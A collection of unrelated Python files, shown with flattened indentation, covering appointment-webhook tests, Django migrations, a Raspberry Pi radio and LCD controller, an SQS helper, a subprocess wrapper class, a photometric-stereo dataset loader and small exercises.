result = await curr.first()
assert result.name == 'testing service'
# remove sort_index and reverse so they're ordered by sort_index
eas = list(reversed([{k: v for k, v in ea_.items() if k != 'sort_index'} for ea_ in extra_attrs]))
assert result.extra_attributes == eas
async def test_delete_old_appointments(db_conn, company, settings):
n = datetime.utcnow()
await create_appointment(db_conn, company, appointment_extra={'id': 1, 'start': n}, service_extra={'id': 1})
await create_appointment(
db_conn, company, appointment_extra={'id': 2, 'start': n - timedelta(days=8)}, service_extra={'id': 2}
)
await create_appointment(
db_conn, company, appointment_extra={'id': 3, 'start': n - timedelta(days=6)}, service_extra={'id': 3}
) # not old enough
await create_appointment(
db_conn,
company,
appointment_extra={'id': 4, 'start': n - timedelta(days=365)},
service_extra={'id': 3},
create_service=False,
)
ctx = {'settings': settings}
await startup(ctx)
ctx['pg_engine'] = MockEngine(db_conn)
assert {(1, 1), (2, 2), (3, 3), (4, 3)} == await select_set(
db_conn, sa_appointments.c.id, sa_appointments.c.service
)
assert {(1,), (2,), (3,)} == await select_set(db_conn, sa_services.c.id)
await delete_old_appointments(ctx)
assert {(1, 1), (3, 3)} == await select_set(db_conn, sa_appointments.c.id, sa_appointments.c.service)
assert {(1,), (3,)} == await select_set(db_conn, sa_services.c.id)
async def test_clear_apts(cli, db_conn, company):
company2 = await create_company(db_conn, 'compan2_public', 'compan2_private', name='company2')
await db_conn.execute(
sa_services.insert().values(
**dict(
id=2,
company=company2.id,
name='testing service',
extra_attributes=[
{
'name': 'Foobar',
'type': 'text_short',
'machine_name': 'foobar',
'value': 'this is the value of foobar',
}
],
colour='#abc',
)
)
)
await create_appointment(db_conn, company, appointment_extra={'id': 1})
for i in range(10):
await create_appointment(
db_conn,
company,
create_service=False,
appointment_extra=dict(
id=i + 2,
start=datetime(2032, 1, 1, 12, 0, 0) + timedelta(days=i + 1),
finish=datetime(2032, 1, 1, 13, 0, 0) + timedelta(days=i + 1),
),
)
for i in range(11, 21):
await create_appointment(
db_conn,
company2,
create_service=False,
appointment_extra=dict(
id=i + 2,
start=datetime(2032, 1, 1, 12, 0, 0) + timedelta(days=i + 1),
finish=datetime(2032, 1, 1, 13, 0, 0) + timedelta(days=i + 1),
),
service_extra=dict(id=2),
)
assert 21 == await count(db_conn, sa_appointments)
assert 2 == await count(db_conn, sa_services)
url = cli.server.app.router['webhook-appointment-clear'].url_for(company='thepublickey')
r = await signed_request(cli, url, method_='DELETE')
assert r.status == 200
assert {'status': 'success'} == await r.json()
assert 10 == await count(db_conn, sa_appointments)
assert 1 == await count(db_conn, sa_services)
async def test_mass_apts(cli, db_conn, company):
await create_appointment(db_conn, company, appointment_extra={'id': 1})
assert 1 == await count(db_conn, sa_appointments)
assert 1 == await count(db_conn, sa_services)
data = {'appointments': []}
for i in range(10):
data['appointments'].append(
dict(
id=i + 2,
service_id=1,
service_name='test service',
extra_attributes=[],
colour='#000000',
appointment_topic='testing appointment',
attendees_max=42,
attendees_count=4,
attendees_current_ids=[1, 2, 3],
start=str(datetime(2032, 1, 1, 12, 0, 0) + timedelta(days=i + 1)),
finish=str(datetime(2032, 1, 1, 13, 0, 0) + timedelta(days=i + 1)),
price=123.45,
location='Whatever',
ss_method='POST',
)
)
url = cli.server.app.router['webhook-appointment-mass'].url_for(company='thepublickey')
r = await signed_request(cli, url, **data)
assert r.status == 200
assert {'status': 'success'} == await r.json()
assert 11 == await count(db_conn, sa_appointments)
assert 1 == await count(db_conn, sa_services)
data = {'appointments': []}
for i in range(9):
data['appointments'].append(
dict(
id=i + 2,
service_id=1,
service_name='test service',
extra_attributes=[],
colour='#000000',
appointment_topic='testing appointment',
attendees_max=42,
attendees_count=4,
attendees_current_ids=[1, 2, 3],
start=str(datetime(2032, 1, 1, 12, 0, 0) + timedelta(days=i + 1)),
finish=str(datetime(2032, 1, 1, 13, 0, 0) + timedelta(days=i + 1)),
price=123.45,
location='Whatever',
ss_method='POST',
)
)
data['appointments'].append({'id': 10, 'ss_method': 'DELETE'})
data['appointments'].append({'id': 11, 'ss_method': 'DELETE'})
url = cli.server.app.router['webhook-appointment-mass'].url_for(company='thepublickey')
r = await signed_request(cli, url, **data)
assert r.status == 200
assert {'status': 'success'} == await r.json()
assert 9 == await count(db_conn, sa_appointments)
assert 1 == await count(db_conn, sa_services)
async def test_mass_apts_and_services(cli, db_conn, company):
await create_appointment(db_conn, company, appointment_extra={'id': 1})
assert 1 == await count(db_conn, sa_appointments)
assert 1 == await count(db_conn, sa_services)
data = {'appointments': []}
for i in range(10):
data['appointments'].append(
dict(
id=i + 2,
service_id=i + 2,
service_name='test service',
extra_attributes=[],
colour='#000000',
appointment_topic='testing appointment',
attendees_max=42,
attendees_count=4,
attendees_current_ids=[1, 2, 3],
start=str(datetime(2032, 1, 1, 12, 0, 0) + timedelta(days=i + 1)),
finish=str(datetime(2032, 1, 1, 13, 0, 0) + timedelta(days=i + 1)),
price=123.45,
location='Whatever',
ss_method='POST',
)
)
url = cli.server.app.router['webhook-appointment-mass'].url_for(company='thepublickey')
r = await signed_request(cli, url, **data)
assert r.status == 200
assert {'status': 'success'} == await r.json()
assert 11 == await count(db_conn, sa_appointments)
assert 11 == await count(db_conn, sa_services)
url = cli.server.app.router['webhook-appointment-clear'].url_for(company='thepublickey')
r = await signed_request(cli, url, method_='DELETE')
assert r.status == 200
assert {'status': 'success'} == await r.json()
assert 0 == await count(db_conn, sa_appointments)
assert 0 == await count(db_conn, sa_services)
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Customers'
db.create_table(u'erp_app_customers', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('first_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
('middle_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
('last_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
('suffix', self.gf('django.db.models.fields.CharField')(max_length=200)),
('email', self.gf('django.db.models.fields.CharField')(max_length=200)),
('company', self.gf('django.db.models.fields.CharField')(max_length=200)),
('display_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
('print_on_check_as', self.gf('django.db.models.fields.CharField')(max_length=200)),
('billing_street', self.gf('django.db.models.fields.CharField')(max_length=200)),
('billing_city', self.gf('django.db.models.fields.CharField')(max_length=200)),
('billing_state', self.gf('django.db.models.fields.CharField')(max_length=2)),
('billing_zip', self.gf('django.db.models.fields.CharField')(max_length=10)),
('billing_country', self.gf('django.db.models.fields.CharField')(max_length=200)),
('shipping_street', self.gf('django.db.models.fields.CharField')(max_length=200)),
('shipping_city', self.gf('django.db.models.fields.CharField')(max_length=200)),
('shipping_state', self.gf('django.db.models.fields.CharField')(max_length=2)),
('shipping_zip', self.gf('django.db.models.fields.CharField')(max_length=10)),
('shipping_country', self.gf('django.db.models.fields.CharField')(max_length=200)),
('other_details', self.gf('django.db.models.fields.CharField')(max_length=500)),
))
db.send_create_signal(u'erp_app', ['Customers'])
# Adding model 'Products'
db.create_table(u'erp_app_products', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=500)),
('description', self.gf('django.db.models.fields.CharField')(max_length=500)),
('price', self.gf('django.db.models.fields.DecimalField')(max_digits=20, decimal_places=2)),
))
db.send_create_signal(u'erp_app', ['Products'])
# Adding model 'Orders'
db.create_table(u'erp_app_orders', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('customer', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['erp_app.Customers'])),
('invoice_number', self.gf('django.db.models.fields.IntegerField')()),
('invoice_creation_date', self.gf('django.db.models.fields.DateField')()),
('delivery_due_date', self.gf('django.db.models.fields.DateField')()),
('payment_due_date', self.gf('django.db.models.fields.DateField')()),
('custom_message', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'erp_app', ['Orders'])
# Adding model 'Orders_Products'
db.create_table(u'erp_app_orders_products', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('order', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['erp_app.Orders'])),
('product', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['erp_app.Products'])),
('quantity', self.gf('django.db.models.fields.IntegerField')(default=0)),
))
db.send_create_signal(u'erp_app', ['Orders_Products'])
# Adding model 'General_Settings'
db.create_table(u'erp_app_general_settings', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('first_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
('last_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
('company', self.gf('django.db.models.fields.CharField')(max_length=200)),
('street', self.gf('django.db.models.fields.CharField')(max_length=200)),
('city', self.gf('django.db.models.fields.CharField')(max_length=200)),
('state', self.gf('django.db.models.fields.CharField')(max_length=2)),
('zip_code', self.gf('django.db.models.fields.CharField')(max_length=10)),
))
db.send_create_signal(u'erp_app', ['General_Settings'])
# Adding model 'Expenses'
db.create_table(u'erp_app_expenses', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('expense_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
('description', self.gf('django.db.models.fields.CharField')(max_length=500)),
('date_paid', self.gf('django.db.models.fields.DateField')()),
('amount_paid', self.gf('django.db.models.fields.DecimalField')(max_digits=20, decimal_places=2)),
))
db.send_create_signal(u'erp_app', ['Expenses'])
def backwards(self, orm):
# Deleting model 'Customers'
db.delete_table(u'erp_app_customers')
# Deleting model 'Products'
db.delete_table(u'erp_app_products')
# Deleting model 'Orders'
db.delete_table(u'erp_app_orders')
# Deleting model 'Orders_Products'
db.delete_table(u'erp_app_orders_products')
# Deleting model 'General_Settings'
db.delete_table(u'erp_app_general_settings')
# Deleting model 'Expenses'
db.delete_table(u'erp_app_expenses')
models = {
u'erp_app.customers': {
'Meta': {'object_name': 'Customers'},
'billing_city': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'billing_country': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'billing_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'billing_street': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'billing_zip': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'company': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'middle_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'other_details': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'print_on_check_as': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'shipping_city': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'shipping_country': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'shipping_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'shipping_street': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'shipping_zip': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'suffix': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'erp_app.expenses': {
'Meta': {'object_name': 'Expenses'},
'amount_paid': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'date_paid': ('django.db.models.fields.DateField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'expense_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'erp_app.general_settings': {
'Meta': {'object_name': 'General_Settings'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'company': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'zip_code': ('django.db.models.fields.CharField', [], {'max_length': '10'})
},
u'erp_app.orders': {
'Meta': {'object_name': 'Orders'},
'custom_message': ('django.db.models.fields.TextField', [], {}),
'customer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['erp_app.Customers']"}),
'delivery_due_date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice_creation_date': ('django.db.models.fields.DateField', [], {}),
'invoice_number': ('django.db.models.fields.IntegerField', [], {}),
'payment_due_date': ('django.db.models.fields.DateField', [], {})
},
u'erp_app.orders_products': {
'Meta': {'object_name': 'Orders_Products'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['erp_app.Orders']"}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['erp_app.Products']"}),
'quantity': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'erp_app.products': {
'Meta': {'object_name': 'Products'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'})
}
}
complete_apps = ['erp_app'] |
"""functions for controlling mpd/mpx radio via python"""
import subprocess
import requests
baseurl = "http://volumio.local/api/v1/commands/?cmd="
def reboot():
"""reboot pi"""
subprocess.call('mpc stop', shell=True)
subprocess.call('reboot', shell=True)
def poweroff():
"""shutdown pi"""
subprocess.call('mpc stop', shell=True)
subprocess.call('poweroff', shell=True)
def volume_up():
requests.get(baseurl + "volume&volume=plus")
def volume_down():
requests.get(baseurl + "volume&volume=minus")
def pause():
"""pause radio playing"""
requests.get(baseurl + "pause")
def play(pos):
requests.get(baseurl + "play")
def toggle():
requests.get(baseurl + "toggle")
def play_next():
"""play next station"""
requests.get(baseurl + "next")
def play_previous():
"""play next station"""
requests.get(baseurl + "prev")
|
#!/usr/bin/python
from time import sleep
from Adafruit_CharLCDPlate import Adafruit_CharLCDPlate
import smbus
# initialize the LCD plate
# use busnum = 0 for raspi version 1 (256MB) and busnum = 1 for version 2
lcd = Adafruit_CharLCDPlate(busnum=0)
# clear display
lcd.clear()
# hello!
lcd.message("Adafruit RGB LCD\nPlate w/Keypad!")
sleep(1)
# first loop, just changes the color
lcd.backlight(lcd.RED)
sleep(.5)
lcd.backlight(lcd.YELLOW)
sleep(.5)
lcd.backlight(lcd.GREEN)
sleep(.5)
lcd.backlight(lcd.TEAL)
sleep(.5)
lcd.backlight(lcd.BLUE)
sleep(.5)
lcd.backlight(lcd.VIOLET)
sleep(.5)
lcd.backlight(lcd.ON)
sleep(.5)
lcd.backlight(lcd.OFF)
sleep(.5)
while True:
if lcd.buttonPressed(lcd.LEFT):
lcd.clear()
lcd.message("Red Red Wine")
lcd.backlight(lcd.RED)
if lcd.buttonPressed(lcd.UP):
lcd.clear()
lcd.message("Sita Sings \nthe blues")
lcd.backlight(lcd.BLUE)
if lcd.buttonPressed(lcd.DOWN):
lcd.clear()
lcd.message("I see fields\nof green")
lcd.backlight(lcd.GREEN)
if lcd.buttonPressed(lcd.RIGHT):
lcd.clear()
lcd.message("Purple mountain\n majesties")
lcd.backlight(lcd.VIOLET)
if lcd.buttonPressed(lcd.SELECT):
lcd.clear()
lcd.backlight(lcd.ON) |
# Modulo de conexion con las colas SQS
import boto.sqs
from worker_settings import *
from boto.sqs.message import Message
conn = boto.sqs.connect_to_region(
AWS_REGION,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
q = conn.get_queue(QUEUE_NAME)
def create_Message(body):
m = Message()
m.set_body(body)
status = q.write(m)
return status
def receive_message():
messages = conn.receive_message(q, number_messages=1, attributes='All')
if(len(messages) > 0):
m = messages[0]
m.change_visibility(600)
return m
else:
return None
def delete_Message(m):
q.delete_message(m)
def get_id(m):
body = m.get_body()
return body
def get_len():
return q.count()
|
from sys import argv
script, filename = argv
print(f"We are going to erase", {filename})
print("If you don't want to erase, hit ctr-c (^c)")
print("if you do want to destroy, hit RETURN.")
input("decision...? ")
print("Opening the file...")
target = open(filename, 'w')
print("Truncating the file. See yah!")
target_read = open(filename, 'r')
target.truncate()
print("Now we are going to insert three lines.")
#line1 = input("Line1: ")
#line2 = input("Line2: ")
#line3 = input("Line3: ")
line = input(""" Write here: """)
print("I'm going to write these to the file")
target.write(line)
#target.write(line1)
#target.write("\n")
#target.write(line2)
#target.write("\n")
#target.write(line3)
#target.write("\n")
print("And we now close the file")
target.close()
print("Here is what you just typed, by opening the file again in read mode")
print(target_read.read()) |
class Solution(object):
def myPow(self, x, n):
"""
:type x: float
:type n: int
:rtype: float
"""
result = 1
if (n < 0):
n = abs(n)
while (n != 0):
result = result * (1 / x)
n = n-1
elif (n > 0):
while (n != 0):
result = result * x
n = n - 1
else:
return result
return result
def PowerDriver():
s = Solution()
x = 4
n = 4
print(s.myPow(x,n))
PowerDriver()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-04 12:34
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('carto', '0008_auto_20171004_1135'),
]
operations = [
migrations.AddField(
model_name='layer',
name='id_objet',
field=models.ForeignKey(db_column='id_objet', default=10, on_delete=django.db.models.deletion.DO_NOTHING, to='carto.Objet'),
preserve_default=False,
),
]
|
from __future__ import division
import os
import numpy as np
import OpenEXR
import torch
import torch.utils.data as data
from datasets import pms_transforms
from . import util
np.random.seed(0)
class UpsSynthTestDataset(data.Dataset):
def __init__(self, args, split='train'):
self.root = os.path.join(args.bm_dir)
self.split = split
self.args = args
self.shape_list = util.read_list(os.path.join(self.root, '%s_mtrl_%s.txt' %
(split, self.args.syn_obj)), sort=False)
self.repeat = 1
def _get_input_path(self, index):
index = index // self.repeat
shape, mtrl = self.shape_list[index].split('/')
normal_path = os.path.join(self.root, 'EXR', shape + '.exr')
if not os.path.exists(normal_path):
normal_path = os.path.join(self.root, 'EXR', shape, shape + '.exr')
img_dir = os.path.join(self.root, 'Images', self.shape_list[index])
exr_dir = os.path.join(self.root, 'EXR', self.shape_list[index])
img_list = util.read_list(os.path.join(img_dir, '%s_%s.txt' % (shape, mtrl)))
data = np.genfromtxt(img_list, dtype='str', delimiter=' ')
dirs = data[:, 1:4].astype(np.float32)
if hasattr(self.args, 'light_index') and self.args.light_index != None:
index_path = os.path.join(self.root, 'Lighting_Index', self.args.light_index)
select_idx = np.genfromtxt(index_path, dtype=int)
else:
select_idx = np.array(range(data.shape[0]))[:100]
print('Image number: %d' % (len(select_idx)))
data = data[select_idx, :]
imgs = [os.path.join(exr_dir, img[:-8] + '.exr') for img in data[:, 0]]
dirs = data[:, 1:4].astype(np.float32)
return normal_path, imgs, dirs
def __getitem__(self, index):
np.random.seed(index)
normal_path, img_list, dirs = self._get_input_path(index)
normal = util.exr_to_array(OpenEXR.InputFile(normal_path), 'normal')
imgs = []
for i in img_list:
img = util.exr_to_array(OpenEXR.InputFile(i), 'color')
imgs.append(img)
img = np.concatenate(imgs, 2)
h, w, c = img.shape
mask = pms_transforms.normal_to_mask(normal, 0.2)
normal = normal * mask.repeat(3, 2)
# As the image intensities of the dark materials are very small, we Scale up the magnitude of the synthetic images
ratio = mask.sum().astype(np.float) / (mask.shape[0] * mask.shape[1]) # ratio of object area in the whole image
thres = 0.02
if img.mean() / ratio < thres: # if the mean value of the object region less than 0.02
# scale the mean value of the object region to thres (i.e., 0.02)
img *= thres / (img.mean() / ratio)
img = (img * 1.5).clip(0, 2)
if self.args.int_aug: # and not no_int_aug:
ints = pms_transforms.get_intensity(len(imgs))
img = np.dot(img, np.diag(ints.reshape(-1)))
else:
ints = np.ones(c)
if self.args.test_resc:
img, normal = pms_transforms.rescale(img, normal, [self.args.test_h, self.args.test_w])
mask = pms_transforms.rescale_single(mask, [self.args.test_h, self.args.test_w])
norm = np.sqrt((normal * normal).sum(2, keepdims=True))
normal = normal / (norm + 1e-10)
item = {'normal': normal, 'img': img, 'mask': mask}
proxys = pms_transforms.get_proxy_features(self.args, normal, dirs)
for k in proxys:
item[k] = proxys[k]
for k in item.keys():
item[k] = pms_transforms.array_to_tensor(item[k])
item['dirs'] = torch.from_numpy(dirs).view(-1, 1, 1).float()
item['ints'] = torch.from_numpy(ints).view(-1, 1, 1).float()
item['obj'] = '_'.join(self.shape_list[index // self.repeat].split('/'))
item['path'] = os.path.join(self.root, 'Images', self.shape_list[index // self.repeat])
return item
def __len__(self):
return len(self.shape_list) * self.repeat
|
# Generated by Django 3.1.3 on 2020-11-25 18:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('test', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ContactInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('email', models.EmailField(max_length=100)),
('comment', models.TextField(blank=True, max_length=1000)),
],
),
]
|
__author__ = 'alexey'
cities = {'red', 'black', 'blue', 'green', 'yellow', 'turquoise', 'orange', 'purple', 'white'}
weighted_subsets = {('red', ('red', 'black', 'blue')): 1.,
('black', ('green', 'black', 'blue', 'green')): 1.,
('blue', ('green', 'black', 'blue', 'green')): 1.,
('green', ('black', 'blue', 'green')): 1.,
('yellow', ('yellow', 'turquoise')): 1.,
('turquoise', ('yellow', 'turquoise')): 1.,
('orange', ('turquoise', 'orange', 'purple')): 1.,
('purple', ('orange', 'purple')): 1.,
('white', ('white',)): 1.}
|
import matplotlib.pyplot as plt, numpy as np, pandas as pd
def graphs():
df = pd.read_csv('weatherbug_scrape.csv')
data = df.values.tolist()
time = []
temp = []
prec = []
mintemp = 0
maxtemp = 0
for i in range(len(data)):
if i != 0:
present = data[i]
time.append(present[1])
tem = int(present[2])
temp.append(tem)
prec.append(present[3])
if i == 1:
mintemp = tem
maxtemp = tem
else:
if tem < mintemp:
mintemp = tem
if tem > maxtemp:
maxtemp = tem
for i in range(2):
plt.plot(time, temp)
plt.xticks(rotation=270)
plt.ylabel('Temperature')
plt.xlabel('Hours')
plt.title('Temperature for each hours')
if i == 1:
plt.yticks(np.arange(0, maxtemp+5, 5))
plt.savefig('TempZoomedOut.png')
else:
plt.yticks(np.arange(mintemp, maxtemp+1, 1))
plt.savefig('TempZoomedIn.png') |
def my_print():
print("pyhon.py:",__name__)
|
a=int(input('Introduceti 1 numar = '))
b=int(input('Introduceti 2 numar = '))
c=int(input('Introduceti 3 numar = '))
if(a>0 and b>0 and c>0):
if(b>c):
print('b')
if(b<c):
print('c')
if(b==c):
print('c')
if(a<0 and b<0 and c<0):
print(a+b) |
import shlex
import subprocess
from .global_storage import Globals
class UninitializedException(Exception):
def __init__(self, process):
self.commandLine = process.commandLine
def __str__(self):
return "Process is not initialized.\nCommand line for process: {0}".format(self.commandLine)
class TerminatedException(Exception):
def __init__(self, process):
self.commandLine = process.commandLine
self.code = process.proc.returncode
def __str__(self):
return "Process is not initialized.\nCommand line for process: {0}\nExit code: {1}".format(self.commandLine, self.code)
class VerificationFailedException(Exception):
def __init__(self, process):
self.commandLine = process.commandLine
def __str__(self):
return "Process verification failed.\nCommand line for process: {0}".format(self.commandLine)
class Process:
processes = []
next_id = 1
@classmethod
def add_process(self, proc):
Process.processes.append(proc)
def __init__(self, commandLine, verifier=None, **kwargs):
self.internalId = Process.next_id
Process.next_id += 1
self.init(commandLine, verifier, **kwargs)
def init(self, commandLine, verifier=None, **kwargs):
self.commandLine = commandLine
if "shell" not in kwargs:
kwargs["shell"] = False
if kwargs["shell"] is True:
kwargs["shell"] = Globals.default_shell
if isinstance(commandLine, list):
self.cmdString = " ".join(commandLine)
args = commandLine
else:
self.cmdString = commandLine
args = shlex.split(commandLine)
print("$ {0}".format(self.cmdString))
out_method = None
if "suppress_output" in kwargs and kwargs["suppress_output"]:
if "redirect_output" in kwargs:
raise ArgumentError("Suppress output and redirect output are mutually exclusive.")
out_method = subprocess.PIPE
elif "redirect_output" in kwargs:
out_method = open(kwargs["redirect_output"], 'w')
cwd = None
if "working_directory" in kwargs:
cwd = kwargs["working_directory"]
env = None
if "environment_file" in kwargs:
cmd = ". {0}; env".format(kwargs["environment_file"])
shell = kwargs["shell"]
if shell is False:
shell = True
if shell is True:
shell = Globals.default_shell
if shell is not True:
cmd = [shell, "-c", '%s' % cmd]
shell = False
pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=shell)
output = pipe.communicate()[0]
env = dict((line.decode().split("=", 1) for line in output.splitlines()))
shell = kwargs["shell"]
if shell is not False and shell is not True:
args = [shell, "-c", ' '.join(args)]
shell = False
self.proc = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=out_method, stderr=subprocess.STDOUT, cwd=cwd, env=env, shell=shell)
self.verifier = verifier
self.options = kwargs
if verifier is not None:
if not verifier.run(self):
raise VerificationFailedException(self)
def __del__(self):
if hasattr(self, "proc") and self.proc is not None:
self.proc.poll()
if self.proc.returncode is None:
self.force_terminate()
def restart(self, timeout=10):
if hasattr(self, "proc") and self.proc is not None:
if self.proc.poll() is None:
self.force_terminate(timeout)
if self.proc.stdin:
self.proc.stdin.close()
if self.proc.stdout:
self.proc.stdout.close()
self.init(self.commandLine, self.verifier, **self.options)
def wait(self, timeout=None):
if hasattr(self, "proc") and self.proc is not None:
notify = False
if self.proc.returncode is None:
notify = True
else:
return self.proc.returncode
code = self.proc.wait(timeout)
if self.proc.returncode is not None and notify and "process.exit" in Globals.messages:
print("Process {0} exited with code {1}".format(self.cmdString, self.proc.returncode))
return code
else:
raise UninitializedException(self)
def write(self, stdin):
if hasattr(self, "proc") and self.proc is not None and self.proc.stdin is not None:
self.proc.stdin.write(stdin)
else:
raise UninitializedException(self)
def code(self, blocking=True, timeout=None):
if hasattr(self, "proc") and self.proc is not None:
code = self.proc.poll()
if code is None and blocking:
try:
self.proc.wait(timeout)
except subprocess.TimeoutExpired:
return None
else:
return code
else:
raise UninitializedException(self)
def poll(self):
if not hasattr(self, "proc") or self.proc is None:
raise UninitializedException(self)
notify = False
if self.proc.returncode is None:
notify = True
self.proc.poll()
if self.proc.returncode is not None and notify and "process.exit" in Globals.messages:
print("Process {0} exited with code {1}".format(self.cmdString, self.proc.returncode))
return self.proc.returncode
def signal(self, signal):
if hasattr(self, "proc") and self.proc is not None and self.proc.returncode is None:
self.proc.send_signal(signal)
elif hasattr(self, "proc") and self.proc is not None:
raise TerminatedException(self)
else:
raise UninitializedException(self)
def pid(self):
if hasattr(self, "proc") and self.proc is not None:
return self.proc.pid
else:
raise UninitializedException(self)
def terminate(self):
if hasattr(self, "proc") and self.proc is not None:
if self.proc.poll() is None:
self.proc.terminate()
self.proc.poll()
else:
raise UninitializedException(self)
def kill(self):
if hasattr(self, "proc") and self.proc is not None:
if self.proc.poll() is None:
self.proc.kill()
self.proc.poll()
else:
raise UninitializedException(self)
def force_terminate(self, timeout=10):
if hasattr(self, "proc") and self.proc is not None:
self.terminate()
try:
self.wait(timeout)
except subprocess.TimeoutExpired:
self.kill()
else:
raise UninitializedException(self)
def status_string(self):
if hasattr(self, "proc") and self.proc is not None:
if self.proc.poll() is None:
return "running"
else:
return "terminated"
else:
raise UninitializedException(self)
def pid(self):
if hasattr(self, "proc") and self.proc is not None:
if self.proc.poll() is not None:
raise TerminatedException(self)
else:
return self.proc.pid
else:
raise UninitializedException(self)
def get_data(self):
procdata = {
"id": self.internalId,
"command": self.cmdString,
"status": self.status_string()
}
if procdata["status"] == "running":
procdata["pid"] = self.pid()
else:
procdata["code"] = self.code(False)
return procdata |
from PIL import Image, PngImagePlugin
import os
def save_resized_image(image):
''' Resizes image and saves '''
PngImagePlugin.MAX_TEXT_CHUNK = 100 * (1024**2)
Image.MAX_IMAGE_PIXELS = None
pil_image = Image.open(image)
pil_image = pil_image.convert('RGB')
pil_image.thumbnail((1080, 1080))
# Несмотря на то, что thumbnail должен давать картинку
# с 1080 по большей стороне, попадаються "аномалии" вида 1000x600,
# которые нужно отсеять
if pil_image.width == 1080 or pil_image.height == 1080:
resized_image = f'resized_images{os.sep}' + \
image.split(os.sep)[-1].replace(".png", ".jpg")
pil_image.save(resized_image, format="JPEG")
def save_resized_images_in_directory(path):
images = []
try:
images = os.listdir(path)
except FileNotFoundError:
pass
try:
os.makedirs("resized_images", exist_ok=False)
except FileExistsError:
pass
for image in images:
if ".jpg" in image or ".png" in image:
save_resized_image(path + image)
def main():
pathes = [f'images{os.sep}hubble{os.sep}',
f'images{os.sep}hubble{os.sep}spacecraft{os.sep}',
f'images{os.sep}hubble{os.sep}news{os.sep}',
f'images{os.sep}spacex{os.sep}']
for path in pathes:
save_resized_images_in_directory(path)
if __name__ == "__main__":
main()
|
import datetime
from sqlalchemy import Column, Integer, ForeignKey, text, TIMESTAMP
from sqlalchemy.dialects.mysql import TEXT
from goldfnd.models import Base
class SurveyAnswerRule(Base):
__tablename__ = 'survey_answer_rule'
id = Column(Integer, primary_key=True, autoincrement=True)
survey_id = Column(Integer, ForeignKey('survey.id'))
reply_id = Column(Integer, ForeignKey('reply.id'))
survey_answer_combinations = Column(TEXT, nullable=False)
